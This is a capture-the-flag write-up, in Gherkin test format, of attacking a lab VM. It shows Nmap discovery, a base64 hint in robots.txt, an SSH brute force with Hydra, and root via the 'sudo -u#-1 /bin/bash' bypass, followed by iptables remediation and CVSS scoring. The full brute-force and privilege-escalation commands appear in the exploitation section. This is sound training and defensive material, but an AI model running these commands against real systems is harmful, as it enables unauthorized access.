## Version 1.4.1
## language: en

Feature:
  TOE:
    Yone
  Category:
    Brute Force
  Location:
    http://192.168.1.71/
  CWE:
    CWE-307: Improper Restriction of Excessive Authentication Attempts
  Rule:
    REQ.237: Ascertain human interaction
  Goal:
    Get the root shell and then obtain flag under /root
  Recommendation:
    Restrict the number of attempts to connect to the system

  Background:
  Hacker Software:
    | <Software name>   |  <Version> |
    | Parrot OS         |  4.10      |
    | Nmap              |  7.80      |
    | Hydra             |  9.0       |
    | VMWare            |  16.0      |
    | SSH               |  1.10      |

  TOE information:
    Given a file with the .OVA file extension is delivered
    Then I run it on VMWare
    And I realize that a user is required to log in to the system
    Then I proceed to make a scan with nmap on my network with the command
    """
    $ nmap -sn 192.168.1.0/24
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-03 10:54 -05
    Nmap scan report for 192.168.1.50
    Host is up (0.043s latency).
    Nmap scan report for 192.168.1.51
    Host is up (0.043s latency).
    Nmap scan report for 192.168.1.53
    Host is up (0.13s latency).
    Nmap scan report for 192.168.1.55
    Host is up (0.0050s latency).
    Nmap scan report for 192.168.1.57
    Host is up (0.0018s latency).
    Nmap scan report for 192.168.1.73
    Host is up (0.023s latency).
    Nmap scan report for 192.168.1.254
    Host is up (0.086s latency).
    Nmap done: 256 IP addresses (7 hosts up) scanned in 8.30 seconds
    """
    Then I determined that the IP of the machine is 192.168.1.57
    And I scanned the IP and found it has 2 open ports
    """
    $ nmap -sS -sV -p- 192.178.1.57
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-03 10:58 -05
    Nmap scan report for 192.168.1.57
    Host is up (0.00056s latency).
    Not shown: 65531 closed ports
    PORT     STATE SERVICE VERSION
    21/tcp   open  ftp     vsftpd 3.0.2
    23/tcp   open  telnet  Linux telnetd
    80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
    7223/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13
    MAC Address: 00:0C:29:AD:43:A7 (VMware)
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results
    Nmap done: 1 IP address (1 host up) scanned in 13.26 seconds
    """

  Scenario: Normal use case
    Given there is not much to see, nor can I interact with the site
    Then a normal use case is to see a 404 error
    """
    Not Found

    The requested URL was not found on this server.
    """
    And only that [evidences](normal.png)

  Scenario: Static detection
    Given I can't access to the source code
    Then I can't do static detection

  Scenario: Dynamic detection
    Given I'm in the website the first thing I did was to check "/robots.txt"
    When I see the following info [evidences](robots.png)
    """
    user-agent: *
    Disallow: /ctf


    user-agent: *
    Disallow: /ftc

    user-agent: *
    Disallow: /sudo





    c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==
    """
    And I see a string base64 encoded
    Then I decode it with base64
    """
    $ echo "c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg==" > out | base64 -d out
    ssh-bruteforce-sudoit
    """
    When I analyze the files [evidences](ctf.png)(ftc.png)(sudo.png)
    """
    ctf.html
    ftc.html
    sudo.html
    """
    And I notice a hardcoded user in the sudo.html source
    """
    <html>
    <body style="background-color:#000000">
        ...
    </body>


    #uname : test

    </html>

    """
    And as the string says "ssh-bruteforce-sudoit"
    Then the idea is to perform a brute force attack on SSH with "test" user

  Scenario: Exploitation
    Given my idea was to brute force against the SSH service
    When I used Hydra with the wordlist "kaonashi14M.txt"
    """
    $ hydra -l test -P kaonashi14M.txt 192.168.1.57 ssh -t 4 -s 7223
    """
    And I successfully got the SSH service password [evidences](passbf.png)
    Then I was able to connect to the service [evidences](connectssh.png)
    """
    $ ssh -p 7223 test@192.168.1.57
    The authenticity of host '[192.168.1.57]:7223 ([192.168.1.57]:7223)'
    ECDSA key fingerprint is SHA256:G7Tc6inx31T83brrAdMJVthwxJkghXVVj2Gooi+yLKE
    Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    Warning: Permanently added '[192.168.1.57]:7223' (ECDSA) to the list
    test@192.168.1.57's password:
    Welcome to Ubuntu 14.04 LTS (GNU/Linux 3.13.0-24-generic x86_64)

     * Documentation:  https://help.ubuntu.com/
    New release '16.04.7 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.

    Last login: Mon Oct 26 23:54:45 2020
    test@ctf:~$
    """
    And now that I have a shell the idea is to get root privileges
    When I use the command "sudo -l" to list user's privileges
    """
    test@ctf:~$ sudo -l
    Matching Defaults entries for test on ctf:
      env_reset, mail_badpass,
      secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin

      User test may run the following commands on ctf:
          (ALL, !root) ALL
    """
    Then I realize that it can run command as root
    When also doing "ls -la" to list all files in the local directory
    """
    test@ctf:~$ ls -la
    total 28
    drwxr-xr-x 3 test test 4096 Sep 24 13:05 .
    drwxr-xr-x 4 root root 4096 Sep 23 00:59 ..
    -rw------- 1 test test 1145 Oct 27 00:02 .bash_history
    -rw-r--r-- 1 test test  220 Sep 23 00:59 .bash_logout
    -rw-r--r-- 1 test test 3637 Sep 23 00:59 .bashrc
    drwx------ 2 test test 4096 Sep 23 01:01 .cache
    -rw-r--r-- 1 test test  675 Sep 23 00:59 .profile
    """
    And I realize that ".bash_history" can be read
    """
    test@ctf:~$ cat .bash_history
    ...
    sudo -u #-1
    sudo --u #-1
    logout
    exit
    sudo -i
    reboot
    sudo -i
    sudo -u#-1 /etc
    sudo -u#-1 /bin/bash
    logout
    test@ctf:~$
    """
    When I see the commands previously executed
    And I notice a suspicious one "sudo -u#-1 /bin/bash"
    Then I executed it and got root shell [evidences](root.png)
    """
    test@ctf:~$ sudo -u#-1 /bin/bash
    root@ctf:~# ls -la
    """

  Scenario: Remediation
    Restrict the number of authentication attempts for the SSH service
    Or ban an IP for exceeding the number of attempts
    And there are many ways to remedy this, that depends on the system
    Then this would be an example using iptables
    """
    # https://unix.stackexchange.com/questions/105553/
      how-to-provide-login-delay-in-ssh

    $ sudo iptables -I INPUT -p tcp --dport <YOUR PORT HERE> -i eth0
    -m state --state NEW -m recent --set
    $ $ sudo iptables -I INPUT -p tcp --dport <YOUR PORT HERE> -i eth0
    -m state --state NEW -m recent --update --seconds 60 --hitcount 4 -j DROP
    """
    And if there are more than 4 attempts from an IP within 60 seconds
    Then any traffic from that IP should be blackholed.

  Scenario: Scoring
    Severity scoring according to CVSSv3 standard
    Base: Attributes that are constants over time and organizations
      9.6/10 (High) - AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    Temporal: Attributes that measure the exploit's popularity and fixability
      8.5/10 (High) - E:P/RL:W/RC:R
    Environmental:Unique and relevant attributes to a specific user environment
      8.5/10 (High) - CR:L/IR:M/AR:M/MAV:A/MAC:L/MPR:N/MUI:N

  Scenario: Correlations
    No correlations have been found to this date {2020-11-3}
